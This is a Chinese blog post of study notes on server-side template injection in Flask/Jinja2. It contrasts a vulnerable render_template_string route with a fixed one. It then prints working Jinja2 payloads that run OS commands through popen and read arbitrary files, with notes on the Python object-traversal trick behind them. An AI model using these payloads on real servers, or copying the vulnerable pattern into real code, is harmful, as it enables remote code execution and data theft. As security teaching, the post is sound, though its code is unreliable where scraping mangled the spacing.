jinja2模板注入_[Flask(Jinja2)服务端模板注入漏洞(SSTI)]学习简记

最新推荐文章于 2024-06-24 00:15:00 发布
最新推荐文章于 2024-06-24 00:15:00 发布
阅读量106 收藏
点赞数
文章标签: jinja2模板注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39743369/article/details/113013333
版权

0x00  关于Flask框架

https://www.cnblogs.com/hello-there/p/12776502.html

我的这篇文章中简单介绍了Flask框架的基本知识

0x01

参考:

https://www.freebuf.com/column/187845.html

0x02 漏洞相关

1)render_template()用来渲染模板文件,而render_template_string()用来渲染一个字符串.

index_page="

This is index page!

"

return render_template_string(index_page)

2)漏洞形成原因:不正确的使用flask中的render_template_string方法会引发SSTI。

a)下面来看一段存在漏洞的代码:

from flask importFlask,render_template_string,request

app= Flask(__name__)

@app.route('/test/')deftest():

code= request.args.get('id') //get方式获取id

html= '''

%s

'''%(code)returnrender_template_string(html)

app.run()

输入[?id=1],页面如下:

eb844c6e841511ad455e831278a8b6a3.png

输入[?id=],看看什么效果?

75738a14a2fe2daf9b6d7a98ffac427d.png

很明显,造成了xss漏洞.

b)将代码进行修改:

from flask importFlask,render_template_string,request

app= Flask(__name__)

@app.route('/test/')deftest():

code= request.args.get('id')

html= '''

{{code}}

'''

return render_template_string(html,code=code)

app.run()

再输入[?id=],查看页面,如下:

0c35c9709cbc8b19d19a7b90a65a1161.png

可以看到,js代码被原样输出了。这是因为模板引擎一般都默认对渲染的变量值进行编码转义,这样就不会存在xss了。在这段代码中用户所控的是code变量,而不是模板内容。存在漏洞的代码中,模板内容直接受用户控制的。

0x03 SSTI文件读取/命令执行

1)先贴两条pyhon2,python3通用的payload:

#命令执行:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}#文件操作

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}

其中第一条payload中的[id]可以替换成命令,如ls,cat等,第二条payload的[filename]也可替换成文件名称.

2)Go deeper

a)通过对python的对象继承一步步来实现文件读取和命令执行,思路大抵为:[寻找父类]->寻找子类->寻找关于命令执行或者文件操作的模块.

__class__返回类所属的对象__mro__输出当前对象所调用的全部类包括其父类__base__同__mro__,用来寻找基类__subclasses__输出该类下所有的子类(返回列表)__init__类的初始化方法__globals__ 对包含函数全局变量的字典的引用

获取字符串类的对象:

''.__class__

->

寻找父类:

''.__class__.__mro__(__base__)

->,,

寻找可用引用:

''.__class__.__base__.__subclasses__()->, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

由于本人目前技术有限,所以后面的过程就参考一位师傅的文章:

https://blog.csdn.net/qq_27446553/article/details/79379136?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-3&utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-3

文章里详细介绍了寻找payload的思路.

weixin_39743369
关注
jinja2模板注入_flask/jinja2模板注入
weixin_30802953的博客
01-17 728
Flask是什么Flask是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。就是部网站用的简单hello worldfrom flask import Flaskapp = Flask(__name__)@app.route("/")def hello():return "Hello World!"if __na...
jinja2模板注入_SSTI服务端模版注入
weixin_36409041的博客
01-17 193
0x1 前言SSTI(服务端模版注入),或者对其还不够了解,在此之前建议去阅读一下James Kettle写的一篇 文章 问题出在开发者定义一个404错误页面,该开发者选择使用字符串格式化将URL动态添加到模版字符串中并返回到页面中,用户对模板是可控的。0x2 测试步骤定义一个错误页面。定义了一个模板字符串。使用格式化字符串的方式将URL动态添加到模版字符串中并返回在页面上。用户对模板是可控的。触...
[GWCTF 2019]你的名字
cjdgg的博客
08-20 1701
[GWCTF 2019]你的名字 打开题目后界面如上所示,你输入什么名字后就会显示出来 说实话,这种题不出意外应该就是模板注入没跑了 试了下{{2+2}}直接报错,还是报的php的错,但是{2+2}就可以正常显示出来,这就说明{{可能被过滤了,而{可能没被过滤,所以我们再试一些只要{}就能用的句子试试,如{% set a=“test” %} 执行完了以后虽然没有回显但也没有报错,说明正常执行了这句话,确定了考点是模板注入后就得想想怎么绕过了 上网找了一篇模板注入绕过相关文章 这里用了if语句执行命令
Flask(Jinja2)服务端模板注入 漏洞复现
Senimo
05-03 2005
FlaskJinja2服务端模板注入漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 模版引擎被 Web 应用程序广泛用于呈现动态数据。不安全的模版语法可以嵌入用户输入实现服务器端的模版注入,这是一个经常出现的严重漏洞。模版注入可以直接攻击 Web 服务器内部结构,并获取到远程代码执行权限(RCE)。 二、漏洞影响 三、漏洞复现 1、环境搭建 使用 Vulhub 在服务器上搭建: cd /vulhub/flask/ssti docke
jinja2模板注入_Flask Jinja2开发中遇到的的服务端注入问题研究
weixin_39575937的博客
01-17 258
原标题:Flask Jinja2开发中遇到的的服务端注入问题研究0×00. 前言作为一个安全工程师,我们有义务去了解漏洞产生的影响,这样才能更好地帮助我们去评估风险值。本篇文章我们将继续研究Flask/Jinja2 开发中遇到的SSTI (服务端模板注入)问题, 如果你从未听过SSTI 或者没有弄清楚它到底是个什么东东,建议您最好先阅读一下。0×01. 测试代码为了更好地演示Flask/Jinja...
FlaskJinja2服务端模板注入漏洞(SSTI)
m0_52920608的博客
11-06 485
flask ssti
Web安全基础学习SSTI模板注入漏洞JINJA2模板注入
qq_51862722的博客
06-24 1142
SSTI服务端模板注入攻击,它主要是由于框架的不规范使用而导致的。主要为python的一些框架,如 jinja2 mako tornado django flask、PHP框架smarty twig thinkphp、java框架jade velocity spring等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。
模板注入与_FLASK.pdf
08-08
本次议题结合Flask框架及其使用的Jinja2模板,讲解了模板注入的原理、注入手段和一些绕过方式,以及结合Python沙盒逃逸思路的一些攻击手段,最后针对模板注入漏洞的发现及防御进行了一些讨论。 模板注入基本成因 ...
Flask jinja2 SSTI 服务端模板注入
qq_57172130的博客
05-03 466
Flask jinja2 SSTI 服务端模板注入 jinja2模板引擎介绍 jinja2:是 Python 下一个被广泛应用的模板引擎,是由Python实现的模板语言,他的设计思想来源于 Django 的模板引擎,并扩展了其语法和一系列强大的功能,其是Flask内置的模板语言。 模板语言:是一种被设计来自动生成文档的简单文本格式,在模板语言中,一般都会把一些变量传给模板,替换模板的特定位置上预先定义好的占位变量名。 注入原理 环境搭建 漏洞复现 ...
ssm9293农家乐管理系统.zip
最新发布
09-28
技术选型 【后端】:Java 【框架】:ssm 【前端】:vue/jsp 【JDK版本】:JDK1.8 【服务器】:tomcat7+ 【数据库】:mysql 5.7+ 包含:项目源码、数据库脚本、项目功能介绍文档等,该项目源码可作为毕设使用。 项目都经过严格调试,确保可以运行! 具体项目介绍可查看博主文章
基于SpringBoot和Vue的青锋后台管理系统设计源码
09-28
该源码是一款基于SpringBoot和Vue构建的青锋后台管理系统,集成了371个文件,涵盖148个Java源文件、85个Vue组件、58个JavaScript脚本、23个XML配置、12个FTL模板、7个XLS表格、5个属性文件、3个JSON配置、3个HTML页面和3个LESS样式表。系统以SpringBoot为核心框架,结合layui和Activiti工作流,具备代码生成器、自定义表单和拖拽可视化报表大屏等功能,为用户提供了一个功能齐全、易于扩展的脚手架平台。尽管开源代码可能存在不足,但欢迎广大开发者提出宝贵意见。
基于51单片机太阳能锂电池充电电压电流检测液晶显示设计(毕业设计)
09-28
本设计由STC89C52单片机+LCD1602液晶显示电路+A/D转换芯片PCF8591电路+电压检测电路+电流检测电路ACS712-5A+继电器控制电路+电源电路设计而成。 功能描述: 1、通过太阳能电池板给锂电池充电,通过单片机检测太阳能给电池的充电电压和充电电流,并在1602液晶上显示出来! 2、通过继电器,有过压保护,当锂电池充电电压超过了4.5V或者充电电流超过1A,继电器断开,充电停止。 资料包含: 程序源码 电路图 任务书 答辩技巧 开题报告 参考论文 系统框图 程序流程图 使用到的芯片资料 器件清单 中期报告 等等资料
外鼻梁条超声焊接机_三维3D设计图纸.zip
09-28
外鼻梁条超声焊接机_三维3D设计图纸.zip
基于PHP+JavaScript+CSS的爱宠狼人杀后台服务设计源码
09-28
本项目是一款基于PHP、JavaScript和CSS的爱宠狼人杀后台服务设计源码,总文件量为176个,其中包括124个PHP文件、12个Git忽略文件、5个JSON文件、4个JavaScript文件以及各类字体和图标文件。该系统专为爱宠狼人杀游戏的后台管理设计,旨在提供高效便捷的管理服务。
基于Java的Spring Security基础教程设计源码
09-28
本项目为Java编写的Spring Security基础教程源码,包含85个文件,其中包括52个Java源文件、17个XML配置文件、13个YAML文件、1个Git忽略文件、1个Markdown文件和1个Word文档,旨在为开发者提供Spring Security框架的学习与实践基础。
Flask框架深度解析:Jinja2模板引擎实战指南
"这篇教程详细介绍了在Python的Flask框架中使用Jinja2模板引擎进行Web开发的方法。Jinja2Flask默认的模板引擎,它允许开发者将动态内容与静态HTML结合,创建出可复用且灵活的网页模板。教程提到了模板文件通常存放...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值